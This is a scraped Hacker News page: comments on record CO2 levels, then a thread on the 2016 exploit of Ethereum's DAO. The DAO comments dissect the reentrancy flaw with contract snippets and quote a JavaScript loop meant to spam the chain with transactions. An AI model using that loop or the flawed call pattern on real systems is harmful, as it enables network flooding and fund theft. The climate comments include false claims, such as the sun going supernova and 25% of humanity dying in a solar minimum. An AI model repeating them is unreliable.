I've been having a bit of an existential crisis about this recently. Is sustainability even possible anymore? We are obviously living beyond the capacity of the earth to cope right now. But is it even possible to sustain this many people (at current standards of living with foreseeable technology)?
8
combatentropy 1 day ago 0 replies      
Up from preindustrial levels of 280 ppm. More: https://en.wikipedia.org/wiki/Carbon_dioxide_in_Earth%27s_at...
9
cconroy 1 day ago 5 replies      
Forgive my ignorance on this issue but Earth has various feedback mechanisms that forestalls CO2: getting absorbed back into rocks and consumption by flora. Is comparing CO2 levels to 4 mya disingenuous because that is just one variable we are isolating? Are we sure that rising CO2 is producing these effects attributed to climate change and not some complicated combination of factors that is evidenced by Earth history of rising temperature followed by cooling temperatures followed by...
10
tim333 1 day ago 4 replies      
I wonder why it was at 400ppm 4m years ago. Presumably the Earth survived the last time.
11
rwhitman 22 hours ago 0 replies      
So my question is, what density of greenhouse gasses does it take to go from "Pliocene" to "Venus"?
13
mturmon 1 day ago 0 replies      
A companion piece about crossing the 400 ppm boundary, also from the southern hemisphere: http://www.sciencemag.org/news/2016/05/atmospheric-carbon-di...
14
Fiahil 1 day ago 1 reply      
So, when should we start our preparation for the apocalypse? 2020? 2025?
15
zaro 16 hours ago 0 replies      
16
ensiferum 18 hours ago 1 reply      
I walk to work. Now are you part of the solution or part of the problem?
17
NietTim 18 hours ago 1 reply      
Woah, so that's even higher when we had no summer in 1800 due to a volcanic eruption?
18
tr1ck5t3r 17 hours ago 2 replies      
Its nice picking your time scales and models to convey a message as this image shows when CO2 was in the thousands parts per million.https://upload.wikimedia.org/wikipedia/commons/7/76/Phaneroz...

Now whilst its true the sun is heating up before it goes super nova millions of years in the future, which is what alot of the global warming fear is based on, and yes man has contributed a small % of CO2 by releasing CO2 from fossil fuels and cut down trees, the biggest threat facing mankind in the next 30 years is the Grand Solar Minimum.

A Grand Solar Minimum (GSM) is where the sunspots in the 11 year solar cycle reduce in frequency and strength and extreme weather becomes common place.

Sun spots reduce extreme weather events.

The last GSM was seen during the Dalton Minimum and Maunder Minimum, which are now classed as mini ice ages. When this occurred we had things like increased volcanic activity which lead to the https://en.wikipedia.org/wiki/Year_Without_a_Summer but extreme cold weather with temperatures seen in the UK of -37 Degrees C, sea ports and the English channel freezing over, extreme winds which did things like blow copious amounts of sand inland, leading to houses being buried in places like Santon Downham, massive inland sand dunes which is what Thetford Forest is planeted on in a bid to return the soil back to some use, but most importantly estimates suggest around 25% of the global population died due to cold and famine due to crop failures.

Today we have increased crop yields so whilst more land has been turned over to agriculture with modern farming practices, the risk is still very much a major threat in the next few decades as a hectare will feed more mouths today than it did during the medieval ice age and the global population has ballooned since the introduction of oil.

There are steps you can take yourself though to reduce your risk, like buying suitable farm land whilst also investing in solar which can power air source heat pumps in case energy supplies & communication become disrupted due to extreme weather events.

1 Watt of solar power can provide upto 3 Watts of heat energy from air source heat pumps. These are just like air con units working in reverse.

Now whilst no one wants to create a panic, looking at the facts in context is important and these points we need to bear in mind.

Firstly there were no meteorological offices during the medieval ice ages, so the evidence amassed by Professor Brian Fagan which you can read about in his book "The Little Ice Age: How Climate Made History 1300-1850" explains how man was affected and were very likely the drivers of political events that led to the French Revolution, the Irish Potatoe famine and more.

Its also worth pointing out that differences in the scientific community means no one really knows whether our manmade CO2 is going to benefit us or not when considering plants grow better with more CO2.

So there you go, a brief introduction of what TPTB are currently capitalizing on, if you fancy capitalizing on it yourself in innovative ways yourself.

19
frogpelt 1 day ago 2 replies      
What if we (humans) don't survive this?

It won't really matter in the long run.

20
tr1ck5t3r 17 hours ago 1 reply      
For context, CO2 has been in the thousands parts per million in the past. https://en.wikipedia.org/wiki/File:Phanerozoic_Carbon_Dioxid...

Sure the planet is warming up as the sun slowly goes super nova in millions of years time, but the biggest short term risk we face in the next 30 years which could last 500 years is the Grand Solar Minimum (GSM)

A GSM is where sunspots drop off and the planet experiences extreme weather patterns which are now seeing now. To a limited degree we see this at the start and end of each 11 yr solar cycle anyway.

This last occurred during the Dalton and Maunder minimum, when 25% of the planets population died due to famine and cold.

It triggered political events like the French Revolution, the Irish Potatoe famine and more.

In the UK temps as low as -37 Degrees C were seen, with sea ports frozen, the English Channel froze keeping ships locked in port or stuck out in open water. Extreme winds lead to massive inland sand dunes which is what Thetford Forest is now planted on in bid to return the soil slowly back to use, the village of Santon Downham had so much sand deposited on it that a few houses were buried. The forest was only planted in the early 1900's.

To re-evalute the history of geo-political events during the medieval ice age and what you may have been taught in history, I would suggest reading the book by Professor Brian Fagan on the mini age, written in the 00's.

Now whilst we had no meteorological offices during the medieval ice age, we can still get valuable insight by learning from history like what Professor Fagan has hilighted in his book, plus depending on what scientific models you listen to, we really dont know how the CO2 released by man from oil and cutting down trees is going to do. Plants grow better in CO2 as seen with dinosaurs and plants during the time when CO2 was in the thousands ppm so our actions may actually be a blessing in disguise, but bear in mind whilst we have higher crop yields today due to modern farming methods, the risk is now greater as one hectare of farm land now feeds more mouths today than ever before.

With that in mind, you can take steps to minimise any impact on yourself, by taking up gardening, and investing in things like air source heat pumps with solar. 1 W of solar energy can create upto 3W of heat energy which is useful should you ever be cut off from the mains. Air source heat pumps are just over priced air con units working in reverse.

By being forewarned is to be forearmed, so whilst the TPTB like to treat people like idiots because you then get dependent idiots, I feel its better to tell the truth so that people can think and innovate their way out of problems which you may be able to capitalise in lucrative ways.

21
Shivetya 14 hours ago 0 replies      
Higher CO2 levels will increase crop yields for many types of foods and in general flip back as the world greens to soak it up.

While some will correctly identify deforestation, animal farming, and fossil fuel usage, most over look the costs in making concrete and the building boom as more of the world gets richer won't help that come down.

22
wolfram74 1 day ago 3 replies      
No no, that just won't do. Math and modeling doesn't allow us to draw conclusions about things we can't directly observe. Someone had to be there and directly count the co2 molecules with their own eyes or it doesn't count as evidence.
23
known 21 hours ago 0 replies      
OPEC should sell its Oil in subsidized rates to countries that are reducing CO2 levels
24
briandear 21 hours ago 2 replies      
"Carbon pollution" -- would we ever claim that higher oxygen levels were "Oxygen pollution."

Plant life thrives at higher CO2 levels, so calling it "pollution" is rather political.

25
skrowl 1 day ago 1 reply      
Who was taking the CO2 measurements 4 million years ago?
26
programminggeek 1 day ago 3 replies      
Assuming the fossil record and all of our measurements and assumptions about our measurements are correct. It's not like anyone was there, writing this stuff down at the time.
27
flockonus 1 day ago 0 replies      
A good and recent video explanation about Earth natural cycles https://www.youtube.com/watch?v=ztninkgZ0ws
11
Critical Update on DAO Vulnerability ethereum.org
489 points by tasti  17 hours ago   574 comments top 104
1
imglorp 15 hours ago 18 replies      
This is what concerns me about contract programming. With human contract law, if there's a minor typo or loophole, participants can generally see the spirit and intent, and at worst go to a judge who will usually enforce the intent. But with software contracts, only the characters matter and there's no intent anywhere: either you get paid or you don't.

ETH is advising, "Contract authors should ... be very careful about recursive call bugs, and listen to advice from the Ethereum contract programming community," which indicates there's some subtle behaviors to be aware of and secure contracts are apparently not easy to write.

Lest you think, "we'll just be careful, review and QA it", consider the bug[1] in the "Programming Pearls" binary search. Bentley was clearly an expert who had proven the algorithm correct and the algorithm had 20 years of careful study by thousands of professionals. Yet it had a simple overflow.

How do _you_ know your contract is secure?

1. https://research.googleblog.com/2006/06/extra-extra-read-all...

2
joosters 19 hours ago 19 replies      
Just remember, when the developers inevitably appear with suggestions about how to stop the hack, roll back the blockchain, or come up with other schemes to block the hackers, they are showing everyone that all the talk of blockchains being decentralised, or being beyond the control of governments or other powers... is a complete lie.

If this hack can be stopped, then it demonstrates that the currency can be manipulated, that the decentralised system is not so fault tolerant or uncensored after all, and that people out there know this.

3
sznurek 16 hours ago 6 replies      
I have a (maybe naive) question: why is the person draining ETH from DAO called "attacker"?

I seems to me that the idea behind smart contracts was to have unambiguous description of what are participants agreeing to. The "attacker" is doing precisely this - I had not heard of any bug in Ethereum implementation that is used, only "bug" in DAO's smart contract. So he is allowed to do this, by contract definition.

Isn't the whole idea of that kind of contracts worthless if people are still rolling back effects of it when "it does not what it was meant to do"?

4
nneonneo 19 hours ago 5 replies      
The provided link is just a page showing a bunch of transactions. For someone like me, who is not so intimate with the Ethereum terminology in use (but who is still interested in the DAO, as an observer), could someone provide a layman's explanation of what's going on?

Somewhat more specifically, I'm wondering the following:

- At a high level, what does this attack actually consist of?

- How does ethereum "go missing" in a distributed blockchain, where you can see all the transaction endpoints?

- Who loses and who gains from an attack of this scale?

- How severe could this attack be - does it pose an existential threat to The DAO (or Ethereum, more broadly)?

- How is this attack being perpetrated? Has the attack vector been previously anticipated? Why is this unexpected?

5
zepolud 16 hours ago 2 replies      
"They say 'there are no atheists in foxholes.' Perhaps, then, there are also no libertarians in crises." [1]

[1] https://www.hks.harvard.edu/fs/jfrankel/CatoRespCrisesJun07+...

6
pjc50 18 hours ago 4 replies      
Well, that was kind of inevitable. Building a financial system out of pure code with no humans in the loop and no legal structure is building a self-distributing bug bounty piata. It's decentralised, so there's nobody who can throw a breaker and shout "stop!"; cryptocurrency transactions are irreversible, so thefts are permanent; and it's somewhat anonymous, so thefts are hard to trace.

It also demonstrates that being first-to-market trumps security. If the DAO had waited until a full formal verification system exists and had been applied, they wouldn't have been able to pick up the $160m of overenthusiastic money keen to rush headlong into the hands of hackers.

7
tomp 16 hours ago 1 reply      
Congratulations! A month after the first real test of the "distributed", "safe" cryptocurrency featuring "enforcable" contracts, it turns out it's none of this.
8
SakiWatanabe 19 hours ago 4 replies      
developer asks token holders to spam the network to delay the attack o.O

griff [10:05 AM]@channel The DAO is being attacked. It has been going on for 3-4 hours, it is draining ETH at a rapid rate. This is not a drill.You can help:If anyone knows who has the split proposals Congo Split, Beer Split and FUN-SPLT-42, please DM me We need their help!If you want to help, you can vote yes on those aforementioned split proposals. especially people whos tokens are blocked because they voted for Prop 43 (the music app one).We need to spam the Network so that we can mount a counter attack all the brightest minds in the Ethereum world are in on this.please use this: for (var i = 0; i < 100; i++) { eth.sendTransaction({from: eth.accounts[4], gas: 2300000, gasPrice: web3.toWei(20, 'shannon'), data: '0x5b620186a05a131560135760016020526000565b600080601f600039601f565b6000f3'}) } to spam the chain

9
vessenes 15 hours ago 1 reply      
I wrote this attack up last week -- a solidity dev initially noticed this bug, but seemed to think it wasn't a big deal. http://vessenes.com/more-ethereum-attacks-race-to-empty-is-t...

The comments here are generally spot on; it's a combination of problems -- upgradability is designed to be hard because other people's money shouldn't be easy to steal, programmers are not used to making whole programs reentrant, existing documentation underplays risks, or alternately just tells people to do the wrong thing.

A better language would help, better documentation would help, better standards about how to write the programs would also help.

And, of course, more eyes are helpful. I'm an outsider to Ethereum, and got a very polite response, overall the community has been great. That said, there just aren't enough people looking at these contracts right now.

10
themgt 15 hours ago 1 reply      
Reading their blog about "smart contract security" [1] is just mind-blowing. Like, I thought that was the core of the product, but somehow they've designed a language which makes it extremely difficult to not get your smart contract hacked? And now the solution to this situation is going to be better documentation and IDEs? Oy.

[1] https://blog.ethereum.org/2016/06/10/smart-contract-security...

11
Taek 11 hours ago 2 replies      
There's a pretty significant lesson here, and it's not that the DAO authors were careless. They were, and so were all of the investors, but the core problem is not the DAO.

It's Solidity. It's the Ethereum virtual machine. Even today, security vulnerabilities are being found in code strategies that are generally considered 'best practice'.

Writing a safe smart contract on Ethereum is extremely difficult, and most people playing with Ethereum don't seem to realize this. There's a pretty well understood maxim, "don't roll your own crypto." Etherem's smart contracts ARE cryptography, and their safety depends on implementation details that are completely hid from users during tutorials, and that even the language designers are only still discovering.

This article does a good job of demonstrating that safety is really hard: https://blog.ethereum.org/2016/06/10/smart-contract-security...

And it's one of the major reasons that the Bitcoin devs have not been excited about Ethereum. It's a project whose ambitions have outpaced our ability to engineer safely.

One day we can have safe smart contracts. But the Ethereum of today is not well designed, and is not a good foundation for smart contracts. A simple hardfork to fix this DAO mess isn't going to be enough. The whole virtual machine needs to be redesigned.

And my money is quite seriously on Bitcoin figuring out the safe way to do smart contracts faster that anyone else. The vast majority of experienced experts in this space are still spending the majority of their time on Bitcoin. As popular as Ethereum has become, Bitcoin still owns the mindshare, and there are good reasons that Bitcoin has chosen not to pursue smart contracts at this time.

12
Animats 7 hours ago 0 replies      
Well, their language is disappointing. They allow programs to ignore function return values, a misfeature inherited from C which has no place in a contracts language.

Then there's the possibility of forcing early program termination via stack overflows.[1] Having to protect against that inside each program is just silly. The contract engine should have been designed so that if a contract program crashes, anything it did is rolled back.

[1] http://hackingdistributed.com/2016/06/16/scanning-live-ether...

13
benmmurphy 17 hours ago 1 reply      
My guess at how the attackers are doing it:

They are calling splitDAO:

https://github.com/slockit/DAO/blob/develop/DAO.sol#L618

splitDAO calls withdrawRewardFor which ends up calling back into the users contract.

https://github.com/slockit/DAO/blob/develop/DAO.sol#L686

 withdrawRewardFor(msg.sender); // be nice, and get his rewards totalSupply -= balances[msg.sender]; balances[msg.sender] = 0; paidOut[msg.sender] = 0;
the state is modified after the callback in particular the balances variable.

however, earlier in the function it moved funds to a new dao based on the balances variable.

 // Move ether and assign new Tokens uint fundsToBeMoved = (balances[msg.sender] * p.splitData[0].splitBalance) / p.splitData[0].totalSupply; if (p.splitData[0].newDAO.createTokenProxy.value(fundsToBeMoved)(msg.sender) == false)
so presumably an attacker can call splitDAO and then recursively call splitDAO and the funds will be transferred twice. there is also some complications around rewardToken because this state is modified before the callback but apparently it is all zero at the moment.

if this is the bug the attackers are exploiting then maybe if they generated rewards it would stop the drain of funds.

however, the fact the draining is still going on and the DAO people are likely to know how they are doing it and it hasn't been stopped reduces my confidence that this is how the attackers are doing it.

EDIT: to add i don't think you can cash out the new DAO for 28 days so this is probably not how the attackers are doing it.

EDIT: update again.

https://blog.slock.it/dao-security-advisory-live-updates-2a0...

'It would appear the attacker has moved the stolen ether to a child DAO, which means that the funds be moved for at least 27 days.'

-> i'm now fairly confident this is how the attack worked :)

14
Tinyyy 16 hours ago 6 replies      
> (The soft fork) will later be followed up by a hard fork which will give token holders the ability to recover their ether.

Does this mean that transactions are going to be rolled back?

If so, are they planning to do this everytime a vulnerability is exploited? Is The DAO too big to fail?

15
defenestration 14 hours ago 1 reply      
Some numbers to get a grasp of the scale:

> There is 2.436.828 Ethereum in the account of the attacker (see: https://etherchain.org/account/0x304a554a310c7e546dfe434669c...)

> That's about 3% of all Ethereum mined (source: http://coinmarketcap.com/currencies/ethereum/)

> The Ethereum in the account of the attacker has a value of $41 million

> The volume is about 30% of all Ethereum trade today

16
benmmurphy 18 hours ago 0 replies      
I'm not expert on etherium code (just started looking at it now) but it looks like the DAO didn't look for similar issues with the latest security fix.

https://github.com/slockit/DAO/commit/f01f3bd8df5e1e222dde62...

 reward = rewardAccount.balance < reward ? rewardAccount.balance : reward; + paidOut[_account] += reward; if (!rewardAccount.payOut(_account, reward)) throw; - paidOut[_account] += reward; + return true; }
but if you grep payOut then you see a similar broken pattern where it modifies the state after the call instead of before it.

 if(_toMembers) { if (!DAOrewardAccount.payOut(dao.rewardAccount(), reward)) throw; } else { if (!DAOrewardAccount.payOut(dao, reward)) throw; } DAOpaidOut[msg.sender] += reward;
but apparently this is not how the DAO is being drained because there are no rewards at the moment.

this is a good summary of the problem:

https://blog.ethereum.org/2016/06/10/smart-contract-security...

and should scare you about the security of smart contracts base on etherium.

EDIT: mm.. maybe it is safe because the addresses dao/dao.rewardAccount() can't be controlled by attackers

17
walrus01 19 hours ago 4 replies      
It's almost as if a cryptocurrency system used by the grey market and black market sections of the internet contained actual blackhats. What a surprise.

Much as I hate to link to reddit, for effective and biting criticism of cryptocurrencies: http://reddit.com/r/buttcoin

18
lordnacho 17 hours ago 1 reply      
I recall reading in the Bitcoin docs that the Forth-like scripting language was non-Turing complete. In addition, nothing particularly complex was using the scripting at the time.

I guess this sort of thing would be the reason. One thing is finding bugs in ordinary software, where the bugs are accidents. It's hard.

Another thing entirely is where you are looking for adversarial bugs. Just look at security articles that appear on HN now and again. They're incredibly complex, and it's not like you can turn off the firehose. When you fix one gap, someone will find another.

I haven't done a lot of reading on ETH, but I would imagine the smart thing to do would be to have some small number of contract types that a lot of people can stare at and try to break. The more attention is distributed among various bespoke contracts, the harder it gets to secure them.

It's like everyone building their own awesome cars, with special bells and whistles, and then asking these non-security engineers to design a lock. Everyone will end up re-learning some painful lessons.

19
narrator 18 hours ago 3 replies      
I always though that Etherium had a huge attack surface. Each script has to be security audited, etc. That's the thing about Bitcoin. It's as simple as possible while still being secure and useful and has been beat up and audited by the best security pros in the world. Distributed Systems are not easy. Secure distributed systems with Byzantine fault tolerance are even harder. Etherium is just trying to do too much.
20
cplease 14 hours ago 1 reply      
Oh, nobody saw that coming. Completely unforeseeable.

What other mature, ready-for-primetime autonomous altcoin networks can I dump my savings into for no apparent reason?

Edit: "DAO token holders and ethereum users should sit tight and remain calm. Exchanges should feel safe in resuming trading ETH."

No they shouldn't. They should running screaming for the exit doors. Less than two months after the launch of this mysterious "DAO" with an entirely bogus value proposition, 1/3 of the money put in, worth presently some $39 million USD in real money, has been confirmed stolen.

21
ThomasRooney 19 hours ago 3 replies      
I started archiving the slock.it #general slack channel when this attack began. This is where most of the discussion has been taking place. Here's up until a few minutes ago:

http://pastebin.com/DykumjLs

22
tankenmate 17 hours ago 1 reply      
Use this link because the ethereum blog is suffering.

http://pastebin.com/xW16N7Ye

23
spdionis 16 hours ago 4 replies      
Can someone eli5 what DAO and ethereum are?
24
peterbonney 11 hours ago 0 replies      
Interesting side point to this: some people wondered why DAO units immediately traded at a discount and many thought it presented an "arbitrage" opportunity, but this hack illustrates why it was always rational that the DAO should trade at less than the redemption value. The value of DAO units is capped on the upside, but not on the downside, and this hack is one way (of many) that downside risk could manifest itself.
25
zby 16 hours ago 0 replies      
The interesting question for now is - is that illegal what that unknown party does? If The DAO code is the contract - then using the code in this way would be like using some fine print clauses in a contract.
26
stevebmark 10 hours ago 0 replies      
Am I misreading this? The suggested solution is hard code an account hash into the source of Ethereum? If that's the case, how can that be taken seriously? It sounds like Ethereum should just start over entirely. The experiment part I failed.
27
Quanttek 19 hours ago 2 replies      
I remember reading somewhere, that the DAO was basically hastly coded under pressure, without any QA or security audit, so that explains things
28
curiousgal 17 hours ago 1 reply      
It's not as bad as it seems. The hackers have their ETH locked in a Child DAO, so they will not be able to get the ETH out for a long time,by which a fix will be issued. The entire Ethereum Ecosystem is collaborating on a solution.

0.https://www.reddit.com/r/ethereum/comments/4oiib4/dao_is_saf...

29
yonilevy 13 hours ago 1 reply      
Just an idea - why not contact the attacker (via a public message), and offer him or her a deal - they get to keep say 1% of the stolen amount, given that they upload a smart contract that guarantees the money is sent from the stolen account to a "trusted" address (from where it will go to DAO 2.0). That way everyone wins, hacker gets paid a fair amount for finding the security hole, no messy forks.
30
vijayboyapati 11 hours ago 0 replies      
Because smart contracts are (often) contractual obligations on real world things, they only hold as much power as the apparatus of coercion (usually the State) will allow them to hold. That is, you must trust the political authority first and foremost before you trust the contract. This is very different to bitcoin, which operates purely in the digital realm, where you can trust the ownership of the btc without requiring trust of the political authority. So bitcoin solves a trust problem and this makes the less efficient distributed architecture worthwhile (it would be much cheaper and far faster to operate a digital currency in a centralized way). But if you have to trust the political authority for digital contracts on physical goods, what is the point of the extra cost? I'm dubious there is any real benefit.
31
jbpetersen 16 hours ago 1 reply      
Response from the official Ethereum Foundation: https://blog.ethereum.org/2016/06/17/critical-update-re-dao-...
32
csomar 19 hours ago 0 replies      
Well, that wasn't long. And we might just found out the single reason against Smart Contracts.
33
anotheryou 17 hours ago 0 replies      
Why is there so much money in a crypto currency so young?

It's young software, of course it will fail around a little.

Is it because the beginning is where you make the bet to become really rich when the thing lifts off?

34
xorcist 8 hours ago 0 replies      
The DAO is written by consultants specializing in Ethereum contracts. They have core developers on their team. They are good, but one mistake is all it takes. (And their business idea to sell a "DAO framework" is probably going to be hard after this.)

The bug that was exploited here has been public for a week before someone decided to try it in practice. There was time to dispense back everyone's ether, had they taken it seriously. But taking security seriously requires an almost superhuman distance to your work.

The Ethereum developers is actively debating whether to put in logic to replay the blockchain in order to give back everyone's ether. While that's probably a good idea, it also means the company behind Ethereum can reverse any contract. That puts them in a difficult situation, as any smart contract platform will have dissatisfied parties at all times. (In comparison, none of the Bitcoin thefts have been reversed, and it's not clear they could have been as development is much less tightly knit.)

It's the most exciting thing since the fall of MtGox. The money at stake is comparable (the DAO is about a fourth of what MtGox was in perceived value).

35
bpierre 16 hours ago 1 reply      
Article content:

Posted by Vitalik Buterin on June 17th, 2016.

An attack has been found and exploited in the DAO, and the attacker is currently in the process of draining the ether contained in the DAO into a child DAO. The attack is a recursive calling vulnerability, where an attacker called the split function, and then calls the split function recursively inside of the split, thereby collecting ether many times over in a single transaction.

The leaked ether is in a child DAO at https://etherchain.org/account/0x304a554a310c7e546dfe434669c... even if no action is taken, the attacker will not be able to withdraw any ether at least for another ~27 days (the creation window for the child DAO). This is an issue that affects the DAO specifically; Ethereum itself is perfectly safe.

The development community is proposing a soft fork, (with NO ROLLBACK; no transactions or blocks will be reversed) which will make any transactions that make any calls/callcodes/delegatecalls that execute code with code hash 0x7278d050619a624f84f51987149ddb439cdaadfba5966f7cfaea7ad44340a4ba (ie. the DAO and children) lead to the transaction (not just the call, the transaction) being invalid, starting from block 1760000 (precise block number subject to change up until the point the code is released), preventing the ether from being withdrawn by the attacker past the 27-day window. This will later be followed up by a hard fork which will give token holders the ability to recover their ether.

Miners and mining pools should resume allowing transactions as normal, wait for the soft fork code and stand ready to download and run it if they agree with this path forward for the Ethereum ecosystem. DAO token holders and ethereum users should sit tight and remain calm. Exchanges should feel safe in resuming trading ETH.

Contract authors should take care to (1) be very careful about recursive call bugs, and listen to advice from the Ethereum contract programming community that will likely be forthcoming in the next week on mitigating such bugs, and (2) avoid creating contracts that contain more than ~$10m worth of value, with the exception of sub-token contracts and other systems whose value is itself defined by social consensus outside of the Ethereum platform, and which can be easily hard forked via community consensus if a bug emerges (eg. MKR), at least until the community gains more experience with bug mitigation and/or better tools are developed.

Developers, cryptographers and computer scientists should note that any high-level tools (including IDEs, formal verification, debuggers, symbolic execution) that make it easy to write safe smart contracts on Ethereum are prime candidates for DevGrants, Blockchain Labs grants and Strings autonomous finance grants.

36
greenspot 19 hours ago 1 reply      
Site doesn't load. Does anyone have a tl;dr for the not so informed? What's DAO? Does Etherum have a weak spot?
37
buttershakes 19 hours ago 2 replies      
This pretty directly contradicts a lot of the hype around Ethereum. Yes, bad contract code is bad, but a lot of money is about to evaporate. If it isn't easy to write secure contracts then there is a serious deployment problem.
38
dnautics 8 hours ago 0 replies      
I currently don't own any etherium. I'd like to point out that those who are saying that this mean there's a "too big to fail" concept within etherium are missing the key point that when the US (and other places) did too big to fail bailouts it was a concerted effort between unelected central bankers and government officials who are percieved to not necessarily have the best interests of the people in mind. At least if etherium makes a decision that the DAO is too big to fail, it will have done so via consensus, and parties that don't like it can take their assets and leave.
39
wslh 14 hours ago 0 replies      
At the risk of being heavily downvoted, I think it is discussable if the hackers deserve their money or not when all the security and ethics are based on code since hacking is a pure part of it. Note that I said "discussable" and not right or wrong.

A good thread is evolving about this here: https://www.reddit.com/r/btc/comments/4oibqw/ding_dong_the_d...

41
shocks 19 hours ago 1 reply      
Can someone explain what is going on here?
42
amluto 10 hours ago 1 reply      
Wow, theDAO has a shockingly cavalier attitude to security (https://github.com/slockit/DAO/wiki/The-DAO-v1.0-Code):

> At the time of deployment, it was discovered that the solidity compiler is not deterministic. AST nodes are identified by their raw pointers. So if we iterate over data structures, different raw pointers might result in a different iteration order.

> We originally wanted to let the community deploy The DAO and then just check the bytecode, but this was not possible at the moment of deployment. So instead a fixed transaction bytecode was provided for the community to deploy.

Shouldn't they have waited to deploy until they figured out how to make it verifiable?

43
mcphilip 18 hours ago 0 replies      
New blog post on dao hub. Seems pretty grim:

https://blog.daohub.org/the-dao-is-under-attack-8d18ca45011b...

44
imdsm 15 hours ago 1 reply      
And now for a critical update regarding the DAO vulnerability...

Error establishing a database connection

45
hkjgkjy 18 hours ago 0 replies      
This is massive. I observe with great interest how it will be handled - Ethereum is still young enough that doing a hard fork can be the sensible choice, and people can agree to do so (since such a large portion of ETH is now owned by baddies).

It has been said before, but there ain't no drama like Blockchain drama. No TV show, no book, nothing has me following it's story as Bitcoin and the other blockchains that come after it. Greatest drama of the millennia, so far.

46
Olscore 19 hours ago 1 reply      
Real time chart for DAO/BTC (Down 41% currently): https://poloniex.com/exchange#btc_dao
47
1012930112 19 hours ago 3 replies      
Is this related to https://www.ethereum.org/ ?

"Ethereum is a decentralized platform for applications that run exactly as programmed without any chance of fraud, censorship or third-party interference."

Right ...

48
joosters 19 hours ago 2 replies      
Slock.it will be so disappointed, they never managed to grab any of the cash from their creation...
49
pure_ambition 14 hours ago 0 replies      
As a non-bitcoin person, I'm sitting here thinking someone's Database Access Object has a vulnerability.
50
curiousgal 17 hours ago 0 replies      
I see a lot of confusion mixed with the good old HN hate for crypto which is justifiable but just to be clear, the breach was with a single piece of software written on the Ethereum network (the DAO). Not a vulnerability with Ethereum. The eth that is locked is the funds that were paid to that contract (TheDAO), not the network's funds.
51
Udo 16 hours ago 0 replies      
As far as attacks go, this seems to fall more within the "for the lolz" category, than an actual attempt to draw money. If they had kept it reasonable, say a couple of hundred thousands worth, this would probably have gone unnoticed for a long time (maybe long enough for the 27 day payout window to expire).
52
sidthekid 14 hours ago 1 reply      
I cant help but imagine the attacker party/their associates read reddit and online forums, and thus would be vocal in criticizing the soft/hard fork decision. The theft of $50m is being rendered useless in front of their eyes - a maddening situation I'm sure.
53
melvinmt 7 hours ago 0 replies      
The price of ETH just went from $20.45 to $14.01 in the last 24 hours... I just got out in time and am gonna wait this out a little bit :)

https://www.gdax.com/trade/ETH-USD

54
codingmyway 18 hours ago 1 reply      
The DAO lasted even less time than I thought.
55
pmorici 18 hours ago 0 replies      
ETH's creator just called on exchanges to halt all trading of ETH and DAO.

https://np.reddit.com/r/ethereum/comments/4oif2x/dao_attack_...

56
ProfChronos 15 hours ago 0 replies      
Why do everyone mixes a decentralized system with a self-controlled system? Decentralization doesn't mean there is no power to regulate or no coordination between users/agents, it is just a model of architecture for a system where power belongs to local entities. That absolutely doesn't mean that there aren't rules and bodies to defend them [1].[1] https://www.intgovforum.org/cms/wks2015/uploads/proposal_bac...
57
eblanshey 13 hours ago 1 reply      
Many people here stating that its purpose is tainted if they can just undo what the attacker did. After all, why not just have a centralized authority after all?

I haven't researched this deeply, admittedly, but I think the idea is that they're using consensus from the community in order to undo what the attacker did. In other words, if the community didn't support it, it wouldn't be possible to do at all. Contrast this with a centralized authority that didn't need community involvement at all.

58
newobj 11 hours ago 0 replies      
I don't really understand smart contracts yet, but wouldn't it have been possible to implement the DAO in a way such that forks/cancellations could be "voted" on by the network somehow, versus requiring whatever this is going to require? Code fork? It least the fork would have been "decentralized" then... this does not bode well at all.
59
return0 18 hours ago 1 reply      
Is this a weakness of ethereum or the DAO ? How much analog money was invested in total in the DAO ?
60
barisser 13 hours ago 0 replies      
What concerns me is that they want to do a soft-fork to handle just this case. One shouldn't fiddle with the protocol every time something like this happens.
61
runn1ng 15 hours ago 0 replies      
62
ikeboy 14 hours ago 0 replies      
Not loading for me, see https://archive.is/YkANN
63
Animats 5 hours ago 0 replies      
Etherium just had its busiest day of trading ever and is down 25%.
64
kerkeslager 14 hours ago 1 reply      
It seems to me that the DAO is a large enough player in the Ethereum community that this plan is likely to succeed. If it does, it will be the first example I know of where a 51% attack was successfully executed against a popular blockchain.

Whether or not this is a desirable thing depends on your goals. From the perspective of the Ethereum community, which is heavily invested in the DAO, it makes a lot of sense. Even if this vulnerability causes you to write off the DAO as a failed experiment, it makes sense to recover some of your lost value before you exit.

However, for my goals, this causes me to write off Ethereum as a cryptocurrency I will never, ever use. It's breaking the fundamental benefits of the cryptocurrency to fix the problems of one group. And further, if this is possible for Ethereum, it makes me think that a 51% attack is more plausible for other cryptocurrencies. This worries me. I'd like to see more research put into defending against 51% attacks.

65
artursapek 11 hours ago 0 replies      
The price of DAO has tanked: https://cryptowat.ch/kraken/daobtc/1h
66
Udo 15 hours ago 2 replies      
As an outsider, this is stunning to me: why isn't there a contract revokation mechanism? Considering these things are programmable, it could be something as simple as a killswitch hash sitting in a lawyer's safe somewhere, right?
67
fovc 9 hours ago 0 replies      
If the attacker is just moving funds into a child DAO, could someone else attack the attacker? A digital Robin Hood?
68
granaldo 17 hours ago 0 replies      
Market is reacting to it https://www.coingecko.com/en/price_charts/ethereum/usdEthereum down from $21 to $15 in minutes
69
_pdp_ 15 hours ago 0 replies      
Since when programming languages are considered safe from logic flows?
70
pmorici 19 hours ago 0 replies      
For context 2 Million ETH is in the 30-40 million USD range at recent market prices.
71
__jal 13 hours ago 1 reply      
One thing I'll say for Ethereal - the problems they have read like the flavor text from a Vernor Vinge novel.
72
baldeagle 16 hours ago 0 replies      
It looks like it stopped at 6am central us. Maybe someone ran it as a scheduled job thinking they could be sneaky about it before becoming inattentive?
73
twoodfin 16 hours ago 0 replies      
Serious questions: Is this a crime? Should it be?
74
dolguldur 10 hours ago 0 replies      
Poor Ethereum now gets the bad press for TheDAO's hasty mistakes.
75
espadrine 16 hours ago 0 replies      
An official statement was issued by Ethereum: https://blog.ethereum.org/2016/06/17/critical-update-re-dao-...

Since it is under load, here is a copy:

An attack has been found and exploited in the DAO, and the attacker is currently in the process of draining the ether contained in the DAO into a child DAO. The attack is a recursive calling vulnerability, where an attacker called the split function, and then calls the split function recursively inside of the split, thereby collecting ether many times over in a single transaction.

The leaked ether is in a child DAO at https://etherchain.org/account/0x304a554a310c7e546dfe434669c... even if no action is taken, the attacker will not be able to withdraw any ether at least for another ~27 days (the creation window for the child DAO). This is an issue that affects the DAO specifically; Ethereum itself is perfectly safe.

